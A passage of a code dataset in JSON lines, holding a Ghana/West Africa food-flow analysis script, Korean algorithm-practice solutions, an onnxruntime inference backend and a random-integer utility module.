\"no\")]\ndf_outgoing_tle_maize_peak=df_outgoing_tle_maize[(df_outgoing_tle_maize['season']=='peak') & (df_outgoing_tle_maize['year']==2014)]\ndaily_quantity_destination_geo_sum_tle=df_outgoing_tle_maize_peak.groupby(['city','commodity_name_gen', 'season', 'year', 'destination_geometry'], as_index=False)['daily_quantity'].sum()\n\ngpd.datasets.get_path(\"naturalearth_lowres\")\ncountries = gpd.read_file(gpd.datasets.get_path(\"naturalearth_lowres\"))\n\ndaily_quantity_source_geo_sum_tle_cp=daily_quantity_source_geo_sum_tle.copy()\ndaily_quantity_destination_geo_sum_tle_cp=daily_quantity_destination_geo_sum_tle.copy()\n\ndaily_quantity_source_geo_sum_tle_cp.loc[:, 'geometry'] = daily_quantity_source_geo_sum_tle_cp.source_geometry.apply(wkt.loads)\ndaily_quantity_source_geo_sum_tle_cp.drop('source_geometry', axis=1, inplace=True) #Drop WKT column\n\ndaily_quantity_destination_geo_sum_tle_cp.loc[:, 'geometry'] = daily_quantity_destination_geo_sum_tle_cp.destination_geometry.apply(wkt.loads)\ndaily_quantity_destination_geo_sum_tle_cp.drop('destination_geometry', axis=1, inplace=True) #Drop WKT column\n\n# Geopandas GeoDataFrame\nfig, (ax1, ax2) = plt.subplots(1,2, sharey=True)\ncountries = gpd.read_file(gpd.datasets.get_path(\"naturalearth_lowres\"))\ncountries[(countries[\"name\"] == \"Ghana\")].plot(color=\"lightgrey\", ax=ax1)\ngdf1 = gpd.GeoDataFrame(daily_quantity_source_geo_sum_tle_cp, geometry='geometry')\ngdf1['values'] = gdf1['daily_quantity']/100 # in 100kg\ngdf1.plot(alpha=0.5, k=5, markersize=gdf1['values'], ax=ax1)\nax1.set_title('inflows')\n\ncountries[(countries[\"name\"] == \"Ghana\")].plot(color=\"lightgrey\", ax=ax2)\ngdf2 = gpd.GeoDataFrame(daily_quantity_destination_geo_sum_tle_cp, geometry='geometry')\ngdf2['values'] = gdf2['daily_quantity']/100 # in 100kg\ngdf2.plot(alpha=0.5, k=5, markersize=gdf2['values'], ax=ax2, legend=True)\nax2.set_title('outflows')\n\nplt.suptitle(\"Maize in Ghana (peak season 2014)\")\nplt.show()\n\n# to export as .GeoJSON (for use in GIS programs)\n\n#gdf1.to_file('/path-to-dir/file_name.GeoJSON', crs='EPSG:4326')\n#gdf2.to_file('/path-to-dir/file_name.GeoJSON', crs='EPSG:4326')\n\n### Fig. 8: Relative inflows of maize (in %) and number of maize source locations along a distance gradient\n#Fig. 8 shows the quantity of maize (in % of total quantity) and number of maize sources (in counts) along a distance gradient aggregated at 10-km intervals. 
We see that Bamenda obtains most of its maize supplies from many nearby sources, while Ouagadougou's major supplier is one city (Bobo-Dioulasso) at a distance of 330 km.\n\n# aggregate at the level of node and compute percent of total quantity (lean season)\ndaily_quantity_sum=df_incoming_lean.groupby(['city','commodity_name_gen', 'season', 'year'], as_index=False)['daily_quantity'].sum()\ndaily_quantity_source_sum=df_incoming_lean.groupby(['city','commodity_name_gen', 'season', 'year', 'source_name', 'distance_to_source_km'], as_index=False)['daily_quantity'].sum()\ndf_incoming_by_node=pd.merge(daily_quantity_source_sum, daily_quantity_sum, how='left', on=['city', 'season', 'year', 'commodity_name_gen'])\ndf_incoming_by_node['percent_of_total_quantity']=df_incoming_by_node['daily_quantity_x']*100/df_incoming_by_node['daily_quantity_y']\n\n# extract maize\n\ndf_incoming_by_node_maize=df_incoming_by_node[(df_incoming_by_node['commodity_name_gen']=='Maize')]\n\n# distance interval\n# aggregate values by 10 km intervals\n\nmax_distance=500\nbins_10km=pd.interval_range(start=0.0, end=max_distance, freq=10)\ndf_10km=df_incoming_by_node_maize.copy()\ndf_10km['interval'] = pd.cut(df_10km.distance_to_source_km, bins=bins_10km.left)\n\n# incoming daily quantities (in % of total quantities) per product and city\n\ndf_sum_10km=df_10km.groupby(['city', 'commodity_name_gen', 'interval'], as_index=False)['percent_of_total_quantity'].sum()\ndf_sum_10km['sum_quantity_percent_by_interval']=df_sum_10km['percent_of_total_quantity']\ndf_sum_10km[['left', 'right']] = [[x.left, x.right] for x in df_sum_10km['interval']]\ndf_count_10km=df_10km.groupby(['city', 'commodity_name_gen', 'interval'], as_index=False)['percent_of_total_quantity'].count()\ndf_count_10km['source_count']=df_count_10km['percent_of_total_quantity']\ndf_sum_count_10km=pd.merge(df_sum_10km, df_count_10km, how='left', on=['city', 'commodity_name_gen', 'interval'])\n\ncity_list=df_sum_count_10km['city'].unique().tolist()\n\nfig, axs = plt.subplots(4, sharex=True)\nfig.subplots_adjust(right=.9)\nfig.subplots_adjust(left=.1)\nfig.subplots_adjust(top=.9)\n\nfor count, city in enumerate(city_list):\n df_sum_count_10km_city=df_sum_count_10km[df_sum_count_10km['city']==city]\n\n distance=df_sum_count_10km_city['right']\n percent_quantity=df_sum_count_10km_city['sum_quantity_percent_by_interval']\n total_source_counts=df_sum_count_10km_city['source_count']\n\n lineplot1=sns.lineplot(x=distance, y=percent_quantity, ax=axs[count], color='#ED553B')\n lineplot1.fill_between(distance, percent_quantity, color='#ED553B',alpha=0.5)\n axs2 = axs[count].twinx()\n lineplot2=sns.lineplot(x=distance, y=total_source_counts, color='#20639B', ax=axs2)\n axs[count].set_title(city, x=0.5, y=0.75, size=9)\n axs[count].set_xlim(0,400)\n axs[count].set_ylim(0,50)\n axs[count].set_xlabel('Distance (km)')\n axs[count].axes.get_yaxis().get_label().set_visible(False)\n axs[count].tick_params(axis='both', which='major', labelsize=8)\n axs2.set_ylim(0,25)\n axs2.axes.get_yaxis().get_label().set_visible(False)\n axs2.tick_params(axis='both', which='major', labelsize=8)\n\n axs[0].legend(['Quantity (in %)'], loc=2, fontsize='8')\n if count ==0:\n axs2.legend(['Number of sources'], loc=1, fontsize='8')\n\nfig.supylabel('Quantity (in %)', size=10)\nfig.text(0.975, 0.5, 'Number of sources', va='center', rotation='vertical', size=10)\nfig.suptitle('Maize inflows along a distance gradient')\nplt.xticks(fontsize=4)\nplt.show()\n\n### Transit flows\n#So far, we only looked at inflows and 
outflows. Transit flows, the third category of flows, are defined as having their source AND destination outside the urban area, i.e., they pass through the city without stopping. This means that transit flows should have been recorded twice, once on entry and once on exit, which is why their quantities are divided by 2. The Tamale-Bolgatanga road, however, was not covered at night during the first survey in 2013. We account for this by not dividing the affected flows by 2 (those flows were recorded only once, on other roads).\n# We look at transit flows for tomato in Tamale during the lean season.\n\n# transit flows for aggregated flows (individual flows divided by 2)\n\ndf_transits=df[(df[\"source_within_urban_boundary\"] == \"no\") & (df[\"destination_within_urban_boundary\"] == \"no\")]\n\ndf_transits_one_flow=df_transits.copy()\ndf_transits_two_flows=df_transits.copy()\n\n# recorded once (peak season 2013 not covered during night on Tamale-Bolga road)\n\ntransits_one_flow_list=[3664, 1640, 1638, 1336, 1895, 1896, 1788, 1897, 1804, 1811, 4287, 1803, 1696, 1839, 1993, 1987, 1991, 1961, 1917, 3459, 1932, 1744, 1786, 1827, 1892, 1699, 1662, 1705, 1774, 1301, 1690, 1830, 1828, 1417, 1322, 1688, 1318, 1340, 1809, 1887, 1704, 1879, 1829, 1884, 1701, 1865, 1861, 1693, 1876, 1762, 1700, 1676, 1298, 1826, 1333, 1655, 1807, 1660, 1311, 3486, 1631, 1300, 1883, 1815, 1908, 1960, 1981, 1926, 1927, 1331, 1931, 1986, 1746, 1355]\ndf_transits_one_flow=df_transits_one_flow.loc[(df_transits_one_flow['city']=='Tamale') & (df_transits_one_flow['original_id'].isin(transits_one_flow_list))]\ndf_transits_one_flow.loc[:, 'daily_quantity_transits']=df_transits_one_flow.loc[:, 'daily_quantity_adjusted_for_missing_locations']\n\n# recorded twice when incoming and outgoing\n\ndf_transits_two_flows=df_transits_two_flows.loc[((df_transits_two_flows['city']=='Tamale') & (~df_transits_two_flows['original_id'].isin(transits_one_flow_list))) | (df_transits_two_flows['city']!='Tamale')]\ndf_transits_two_flows.loc[:, 'daily_quantity_transits']=df_transits_two_flows.loc[:, 'daily_quantity_adjusted_for_missing_locations']/2\ndf_transits_sum=pd.concat([df_transits_one_flow, df_transits_two_flows])\n\n# analysis\n# extract crop, season and year\n\ndf_transits_sum_tomato_lean=df_transits_sum[(df_transits_sum['season']=='lean') & (df_transits_sum['year']==2014) & (df_transits_sum['commodity_name_gen']=='Tomato')].copy()\ngrp_df_transits_sum_tomato_lean=df_transits_sum_tomato_lean.groupby(by=['city', 'commodity_name_gen', 'source_name', 'destination_name'], as_index=False)['daily_quantity_transits'].sum()\ndf_transits_sum_tomato_lean_tle=grp_df_transits_sum_tomato_lean[grp_df_transits_sum_tomato_lean['city']=='Tamale']\ndf_transits_sum_tomato_lean_tle.head()\ndf_transits_sum_tomato_lean_tle_sel_columns=df_transits_sum_tomato_lean_tle[['source_name', 'destination_name', 'daily_quantity_transits']]\ndf_transits_sum_tomato_lean_tle_sel_columns.sort_values(by=['daily_quantity_transits'], ascending=False)\n\n\n### Technical validation\n#The following section contains the figures used for assessing the technical validation of the data.\n\n# comparing peak and lean season data (in- and outflows) for Tamale\n# preparing the data according to type of flow (in, out) and season\n\ndf_incoming_lean_tle= df_incoming[(df_incoming['season']=='lean') & (df_incoming['city']=='Tamale')]\ndf_incoming_lean_tle_agg=df_incoming_lean_tle.groupby(by=['city', 'season', 'year', 'commodity_name_gen'], as_index= 
False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_lean_tle_agg_direction=df_incoming_lean_tle_agg.copy()\ndf_incoming_lean_tle_agg_direction['direction']='in'\n\ndf_incoming_peak_tle= df_incoming[(df_incoming['season']=='peak') & (df_incoming['city']=='Tamale')]\ndf_incoming_peak_tle_agg=df_incoming_peak_tle.groupby(by=['city', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_peak_tle_agg_direction=df_incoming_peak_tle_agg.copy()\ndf_incoming_peak_tle_agg_direction['direction']='in'\n\ndf_outgoing_lean_tle= df_outgoing[(df_outgoing['season']=='lean') & (df_outgoing['city']=='Tamale')]\ndf_outgoing_lean_tle_agg=df_outgoing_lean_tle.groupby(by=['city', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_lean_tle_agg_direction=df_outgoing_lean_tle_agg.copy()\ndf_outgoing_lean_tle_agg_direction['direction']='out'\n\ndf_outgoing_peak_tle= df_outgoing[(df_outgoing['season']=='peak') & (df_outgoing['city']=='Tamale')]\ndf_outgoing_peak_tle_agg=df_outgoing_peak_tle.groupby(by=['city', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_peak_tle_agg_direction=df_outgoing_peak_tle_agg.copy()\ndf_outgoing_peak_tle_agg_direction['direction']='out'\n\n# annual variation\n\nincoming_lean_tle_variation=df_incoming_lean_tle_agg_direction.pivot(index='commodity_name_gen', columns='year', values='daily_quantity_adjusted_for_missing_locations')\nincoming_lean_tle_variation['variation_percent']=(incoming_lean_tle_variation[2014]-incoming_lean_tle_variation[2015])*100/incoming_lean_tle_variation[2014]\nincoming_lean_tle_variation['season_direction']='Lean season in'\n\noutgoing_lean_tle_variation=df_outgoing_lean_tle_agg_direction.pivot(index='commodity_name_gen', columns='year', values='daily_quantity_adjusted_for_missing_locations')\noutgoing_lean_tle_variation['variation_percent']=(outgoing_lean_tle_variation[2014]-outgoing_lean_tle_variation[2015])*100/outgoing_lean_tle_variation[2014]\noutgoing_lean_tle_variation['season_direction']='Lean season out'\n\nincoming_peak_tle_variation=df_incoming_peak_tle_agg_direction.pivot(index='commodity_name_gen', columns='year', values='daily_quantity_adjusted_for_missing_locations')\nincoming_peak_tle_variation['variation_percent']=(incoming_peak_tle_variation[2013]-incoming_peak_tle_variation[2014])*100/incoming_peak_tle_variation[2013]\nincoming_peak_tle_variation['season_direction']='Peak season in'\n\noutgoing_peak_tle_variation=df_outgoing_peak_tle_agg_direction.pivot(index='commodity_name_gen', columns='year', values='daily_quantity_adjusted_for_missing_locations')\noutgoing_peak_tle_variation['variation_percent']=(outgoing_peak_tle_variation[2013]-outgoing_peak_tle_variation[2014])*100/outgoing_peak_tle_variation[2013]\noutgoing_peak_tle_variation['season_direction']='Peak season out'\n\n# compare annual variation in %\n# minor flows are ommitted\nlist_products=['Avocado', 'Bean', 'Cassava', 'Cattle', 'Fish', 'Gari', 'Groundnut', 'Maize', 'Millet', 'Onion', 'Plantain', 'Rice', 'Sorghum', 'Soybean', 'Tomato', 'Yam', 'Banana', 'Orange', 'Watermelon']\n\ntle_variation_comp=pd.concat([outgoing_lean_tle_variation, 
outgoing_peak_tle_variation,incoming_lean_tle_variation,incoming_peak_tle_variation])\ntle_variation_comp1=tle_variation_comp.reset_index()\ntle_variation_comp_selected_products=tle_variation_comp1.loc[tle_variation_comp1['commodity_name_gen'].isin(list_products)]\n\nprint(tle_variation_comp_selected_products)\n\n# plot annual variation\n\ndf_incoming_lean_tle_agg_direction['Flow type by season']='Inflows (lean)'\ndf_incoming_peak_tle_agg_direction['Flow type by season']='Inflows (peak)'\ndf_outgoing_lean_tle_agg_direction['Flow type by season']='Outflows (lean)'\ndf_outgoing_peak_tle_agg_direction['Flow type by season']='Outflows (peak)'\n\ntle_variation=pd.concat([df_incoming_lean_tle_agg_direction, df_outgoing_lean_tle_agg_direction, df_incoming_peak_tle_agg_direction, df_outgoing_peak_tle_agg_direction])\ntle_variation_tonnes=tle_variation.copy()\ntle_variation_tonnes['Daily flows (in tonnes)']=tle_variation_tonnes['daily_quantity_adjusted_for_missing_locations']/1000\n\ntle_variation_selected_products=tle_variation_tonnes.loc[tle_variation_tonnes['commodity_name_gen'].isin(list_products)]\n\npalette = {'Inflows (lean)': '#20639B', 'Inflows (peak)': '#3CAEA3', 'Outflows (lean)': '#F6D55C', 'Outflows (peak)':'#ED553B'}\nplt.figure(figsize=(10, 6))\nax=sns.barplot(data=tle_variation_selected_products, y='Daily flows (in tonnes)', x='commodity_name_gen', hue='Flow type by season', palette=palette, errorbar=(\"pi\", 100), errwidth=1.5)\nplt.xlabel('Commodity')\nplt.xticks(fontsize=8, rotation=45)\nplt.yticks(fontsize=8)\nplt.ylim(0, 350)\nplt.setp(ax.get_legend().get_texts(), fontsize='8') # for legend text\nplt.setp(ax.get_legend().get_title(), fontsize='10') # for legend title\nplt.show()\n\n\n# balance compared with FAO food balance sheets (available on https://www.fao.org/faostat/en/#data/FBS)\n# selected products (item codes codes S2511, S2807, S2514, S2517, S2518, S2532, S2531, S2533, S2535, S2546,\n# S2552, S2601, S2602, S2611, S2615, S2616, S2618), BF: 2014, Ghana: 2014, Mali: 2016, Cameroon: 2017 (available in supplemental_information)\n\ndirectory_FAO=\"/my_directory/\"\ndf_food_balance_sheet=pd.read_csv(directory_FAO+\"Supplementary_Table_2.csv\", delimiter=';')\ndf_food_balance_sheet['Food supply (FAO)']=df_food_balance_sheet['Value']\n\n\n# summarise wheat and wheat flour\n\ndf_incoming.loc[df_incoming['commodity_name_gen']=='Wheat flour', 'commodity_name_gen'] = 'Wheat'\ndf_outgoing.loc[df_outgoing['commodity_name_gen']=='Wheat flour', 'commodity_name_gen'] = 'Wheat'\n\ndf_incoming_agg=df_incoming.groupby(by=['city', 'population', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_agg=df_outgoing.groupby(by=['city', 'population', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\n\n# our data\n# in\n\ndf_incoming_agg['kg_cap_year']=df_incoming_agg['daily_quantity_adjusted_for_missing_locations']/df_incoming_agg['population']*365\ndf_outgoing_agg['kg_cap_year']=df_outgoing_agg['daily_quantity_adjusted_for_missing_locations']/df_outgoing_agg['population']*365\n\n# Tamale: average season\ndf_incoming_agg_tle=df_incoming_agg[df_incoming_agg['city']=='Tamale']\ndf_incoming_agg_tle_average_season=df_incoming_agg_tle.groupby(by=['city', 'population', 'season', 'commodity_name_gen'], as_index= False)['kg_cap_year'].mean()\n\n# other cities\ndf_incoming_agg_other=df_incoming_agg[(df_incoming_agg['city']=='Ouagadougou') | 
(df_incoming_agg['city']=='Bamako') | (df_incoming_agg['city']=='Bamenda')]\ndf_incoming_agg_all=pd.concat([df_incoming_agg_tle_average_season, df_incoming_agg_other])\ndf_incoming_agg_average=df_incoming_agg_all.groupby(by=['city', 'population','commodity_name_gen'], as_index= False)['kg_cap_year'].mean()\ndf_incoming_agg_average['Inflows (this dataset)']=df_incoming_agg_average['kg_cap_year']\n\n# out\n\ndf_outgoing_agg['kg_cap_year']=df_outgoing_agg['daily_quantity_adjusted_for_missing_locations']/df_outgoing_agg['population']*365\ndf_outgoing_agg['kg_cap_year']=df_outgoing_agg['daily_quantity_adjusted_for_missing_locations']/df_outgoing_agg['population']*365\n\n# Tamale: average season\ndf_outgoing_agg_tle=df_outgoing_agg[df_outgoing_agg['city']=='Tamale']\ndf_outgoing_agg_tle_average_season=df_outgoing_agg_tle.groupby(by=['city', 'population', 'season', 'commodity_name_gen'], as_index= False)['kg_cap_year'].mean()\n\n# other cities\ndf_outgoing_agg_other=df_outgoing_agg[(df_outgoing_agg['city']=='Ouagadougou') | (df_outgoing_agg['city']=='Bamako') | (df_outgoing_agg['city']=='Bamenda')]\ndf_outgoing_agg_all=pd.concat([df_outgoing_agg_tle_average_season, df_outgoing_agg_other])\ndf_outgoing_agg_average=df_outgoing_agg_all.groupby(by=['city', 'population','commodity_name_gen'], as_index= False)['kg_cap_year'].mean()\ndf_outgoing_agg_average['Outflows (this dataset)']=df_outgoing_agg_average['kg_cap_year']\n\n# balance\n\ndf_in_out_agg_average=pd.merge(df_incoming_agg_average, df_outgoing_agg_average, how='left', on=['city', 'commodity_name_gen'])\ndf_in_out_agg_average['Net inflows (this dataset)']=df_in_out_agg_average['Inflows (this dataset)']-df_in_out_agg_average['Outflows (this dataset)']\n\ndf_in_out_agg_average['Item Code (CPC)']=''\ndf_in_out_agg_average['Area Code (M49)']=999\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Wheat', 'Item Code (CPC)'] = 'S2511'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Rice', 'Item Code (CPC)'] = 'S2807'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Maize', 'Item Code (CPC)'] = 'S2514'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Millet', 'Item Code (CPC)'] = 'S2517'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Sorghum', 'Item Code (CPC)'] = 'S2518'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Cassava', 'Item Code (CPC)'] = 'S2532'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Potato', 'Item Code (CPC)'] = 'S2531'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Sweet potato', 'Item Code (CPC)'] = 'S2533'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Yam', 'Item Code (CPC)'] = 'S2535'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Bean', 'Item Code (CPC)'] = 'S2546'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Groundnut', 'Item Code (CPC)'] = 'S2552'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Onion', 'Item Code (CPC)'] = 'S2602'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Tomato', 'Item Code (CPC)'] = 'S2601'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Orange', 'Item Code (CPC)'] = 'S2611'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Banana', 'Item Code (CPC)'] = 
'S2615'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Plantain', 'Item Code (CPC)'] = 'S2616'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Pineapple', 'Item Code (CPC)'] = 'S2618'\n\ndf_in_out_agg_average.loc[df_in_out_agg_average['city']=='Tamale', 'Area Code (M49)'] = 288\ndf_in_out_agg_average.loc[df_in_out_agg_average['city']=='Ouagadougou', 'Area Code (M49)'] = 854\ndf_in_out_agg_average.loc[df_in_out_agg_average['city']=='Bamako', 'Area Code (M49)'] = 466\ndf_in_out_agg_average.loc[df_in_out_agg_average['city']=='Bamenda', 'Area Code (M49)'] = 120\n\njoin_data_balance_with_FAO_food_balance=pd.merge(df_in_out_agg_average, df_food_balance_sheet, how='inner', on=[\"Item Code (CPC)\", \"Area Code (M49)\"])\n\n# variation in %\njoin_data_balance_with_FAO_food_balance['variation_percent']=(join_data_balance_with_FAO_food_balance['Net inflows (this dataset)']-join_data_balance_with_FAO_food_balance['Food supply (FAO)'])*100/join_data_balance_with_FAO_food_balance['Net inflows (this dataset)']\njoin_data_balance_with_FAO_food_balance.head()\n\n# plot\njoin_data_balance_with_FAO_food_balance_melt=join_data_balance_with_FAO_food_balance.melt(id_vars=['city', 'commodity_name_gen'], value_vars=['Inflows (this dataset)', 'Net inflows (this dataset)', 'Food supply (FAO)'])\njoin_data_balance_with_FAO_food_balance['city'].unique()\n\npalette={'Inflows (this dataset)': \"#FFE599\", 'Net inflows (this dataset)': \"#ED553B\", 'Food supply (FAO)': \"#20639B\"}\n\nfig, axs = plt.subplots(4, sharex=True, figsize=(13, 15))\nfor count, city in enumerate(join_data_balance_with_FAO_food_balance_melt['city'].unique()):\n join_data_balance_with_FAO_food_balance_melt_city=join_data_balance_with_FAO_food_balance_melt[join_data_balance_with_FAO_food_balance_melt['city']==city]\n sns.lineplot(data=join_data_balance_with_FAO_food_balance_melt_city, x='commodity_name_gen', y='value', hue='variable', ax=axs[count], palette=palette)\n axs[count].axes.get_yaxis().get_label().set_visible(False)\n axs[count].set_title(city, x=0.5, y=0.85, size=9)\n axs[count].tick_params(axis='y', which='major', labelsize=8)\n plt.xticks(fontsize=8, rotation=45)\n fig.supylabel('kg/cap/year', x=0.06, size=10)\n axs[count].legend([],[], frameon=False)\n handles, labels = axs[3].get_legend_handles_labels()\n fig.legend(handles, labels, loc='upper center')\nplt.xlabel('Commodity')\nplt.show()","repo_name":"HannaKarg/food-flows","sub_path":"food_flow_script.py","file_name":"food_flow_script.py","file_ext":"py","file_size_in_byte":28828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
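The 10-km aggregation in the script above hinges on pandas interval machinery: pd.interval_range builds the bins and pd.cut assigns each distance to one. A toy illustration with made-up distances; note that passing only bins_10km.left, as the script does, drops the final bin edge, so values in the last interval fall out as NaN:

import pandas as pd

distances = pd.Series([3.2, 14.9, 15.1, 42.0])             # hypothetical distances in km
bins_10km = pd.interval_range(start=0.0, end=50, freq=10)  # (0,10], (10,20], ..., (40,50]
print(pd.cut(distances, bins=bins_10km.left))              # 42.0 -> NaN (beyond the last edge, 40)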
+{"seq_id":"16716127273","text":"#################### 2798 Blackjack\n\n# Attempt 1 (108ms)\nN, M = map(int, input().split())\ncards = list(map(int, input().split()))\ntotal = []\nfor i in range(N):\n for j in range(i+1, N):\n for k in range(j+1, N):\n sum = cards[i] + cards[j] + cards[k]\n if sum <= M:\n total.append(sum)\nprint(max(total))\n\n# Attempt 2 (80ms)\nN, M = map(int, input().split())\ncards = list(map(int, input().split()))\ntotal = 0\nfor i in range(N):\n for j in range(i+1, N):\n for k in range(j+1, N):\n sum = cards[i] + cards[j] + cards[k]\n if (sum <= M) & (sum > total):\n total = sum\nprint(total)\n\n\n#################### 2231 Decomposition Sum\nN = int(input()) \n\nfor i in range(1, N+1): # i = every candidate generator of N (e.g., when i = 198)\n num = sum((map(int, str(i)))) # add up each digit of i (num = 1+9+8 = 18)\n num_sum = i + num # decomposition sum = generator + digit sum (num_sum = 198 + 18 = 216)\n # the first i whose decomposition sum equals the input is the smallest generator\n if num_sum == N: # e.g. 216 == 216\n print(i)\n break\nelse: # if the for loop finishes without finding an i where num_sum == N\n print(0)\n \n \n##################### 19532 Math Is a Non-Face-to-Face Lecture\na,b,c,d,e,f = list(map(int,input().split()))\nvalues = []\n\n# brute-force substitution (try every x and y from -999 to 999)\nfor x in range(-999, 1000):\n for y in range(-999, 1000):\n if a*x + b*y == c:\n values.append([x,y])\n\n# plug each (x, y) pair from the first equation into the second to find the final solution\nfor xy in values:\n if d*xy[0] + e*xy[1] == f:\n print(xy[0], xy[1])\n break","repo_name":"wonn23/algorithm-study","sub_path":"0418/0418_sng.py","file_name":"0418_sng.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"21604674939","text":"\"\"\"\nonnxruntime backend (https://github.com/microsoft/onnxruntime)\n\"\"\"\n\n# pylint: disable=unused-argument,missing-docstring,useless-super-delegation\n\nimport onnxruntime as rt\nimport os\nimport backend\n\n\nclass BackendOnnxruntime(backend.Backend):\n def __init__(self):\n super(BackendOnnxruntime, self).__init__()\n\n def version(self):\n return rt.__version__\n\n def name(self):\n \"\"\"Name of the runtime.\"\"\"\n return \"onnxruntime\"\n\n def image_format(self):\n \"\"\"image_format. For onnx it is always NCHW.\"\"\"\n return \"NCHW\"\n\n def load(self, model_path, inputs=None, outputs=None):\n \"\"\"Load model and find input/outputs from the model file.\"\"\"\n opt = rt.SessionOptions()\n\n # By default all optimizations are enabled\n # https://onnxruntime.ai/docs/performance/graph-optimizations.html\n # Enable only upto extended optimizations on aarch64 due to an accuracy issue\n if os.environ.get(\"HOST_PLATFORM_FLAVOR\", \"\") == \"aarch64\":\n opt.graph_optimization_level = rt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED\n\n # self.sess = rt.InferenceSession(model_path, opt)\n if len(rt.get_all_providers()) > 1 and os.environ.get(\"USE_GPU\", \"yes\").lower() not in [ \"0\", \"false\", \"off\", \"no\" ]:\n self.sess = rt.InferenceSession(model_path, opt, providers=[\"CUDAExecutionProvider\"])\n else:\n self.sess = rt.InferenceSession(model_path, opt, providers=[\"CPUExecutionProvider\"])\n \n # get input and output names\n if not inputs:\n self.inputs = [meta.name for meta in self.sess.get_inputs()]\n else:\n self.inputs = inputs\n if not outputs:\n self.outputs = [meta.name for meta in self.sess.get_outputs()]\n else:\n self.outputs = outputs\n return self\n\n def predict(self, feed):\n \"\"\"Run the prediction.\"\"\"\n return self.sess.run(self.outputs, feed)\n","repo_name":"mlcommons/inference","sub_path":"vision/classification_and_detection/python/backend_onnxruntime.py","file_name":"backend_onnxruntime.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":971,"dataset":"github-code","pt":"71"}
+{"seq_id":"26476127743","text":"from __future__ import annotations\n\nimport secrets\nfrom math import factorial\nfrom os import urandom\n\nfrom .distributions import random\n\n\ndef rand_below(n: int) -> int:\n \"\"\"Returns a random int in the range [0, n).\"\"\"\n return secrets.randbelow(n)\n\n\ndef rand_bits(k: int) -> int:\n \"\"\"Generates an int with k random bits.\"\"\"\n if k < 0:\n raise ValueError(\"number of bits must be non-negative\")\n numbytes = (k + 7) // 8\n x = int.from_bytes(urandom(numbytes), \"big\")\n return x >> (numbytes * 8 - k)\n\n\ndef rand_bool() -> bool:\n \"\"\"Returns a random bool.\"\"\"\n return random() < 0.5\n\n\ndef rand_int(a: int, b: int) -> int:\n \"\"\"Returns random integer in range [a, b], including both end points.\"\"\"\n return rand_range(a, b + 1)\n\n\ndef rand_ints(a: int, b: int, *, k: int) -> list[int]:\n \"\"\"Returns a list of k random integers in range [a, b].\"\"\"\n return [rand_int(a, b) for _ in range(k)]\n\n\ndef rand_range(start: int, stop: int | None = None, step: int = 1) -> int:\n \"\"\"Chooses a random item from range([start,] stop[, step]).\"\"\"\n if stop is None:\n if step != 1:\n raise TypeError(\"Missing a non-None stop argument\")\n if start > 0:\n return secrets.randbelow(start)\n raise ValueError(\"empty range for rand_range\")\n\n width = stop - start\n if step == 1:\n if width > 0:\n return start + secrets.randbelow(width)\n raise ValueError(f\"empty range for rand_range ({start}, {stop}, {step})\")\n\n if step > 0:\n n = (width + step - 1) // step\n elif step < 0:\n n = (width + step + 1) // step\n else:\n raise ValueError(\"zero step for rand_range\")\n if n <= 0:\n raise ValueError(\"empty range for rand_range\")\n return start + step * secrets.randbelow(n)\n\n\ndef universe_rand() -> int:\n \"\"\"Generates a random number based on the universe.\"\"\"\n bm = 0xFF # bound max, 1 byte\n s = 0\n lt = ord(\"\\n\") # low threshold\n xn: list[int] = []\n ltc = lt\n for i in range(ltc // 2):\n ltc -= i\n xn.append(lt - ltc)\n s = xn.pop(s) # sigma\n for j in range(len(xn)):\n xn[j] -= sum(xn[:j])\n a, b, c, _ = xn\n # simulates quantum noise\n while s < bm:\n t = rand_int(0x00, bm) # theoretical (size -> inf) entity noise probability\n s += int(sum((t**i) / factorial(i) for i in range(t % bm))) # taylor series\n ds = sum(map(int, str(s)))\n while ds >= lt:\n ds = sum(map(int, str(ds))) # one-digit convergence\n return int(bin(bm % (lt + a))[b:] * c, base=2) # as ds converges to lt\n","repo_name":"trag1c/ixia","sub_path":"src/ixia/integers.py","file_name":"integers.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"}
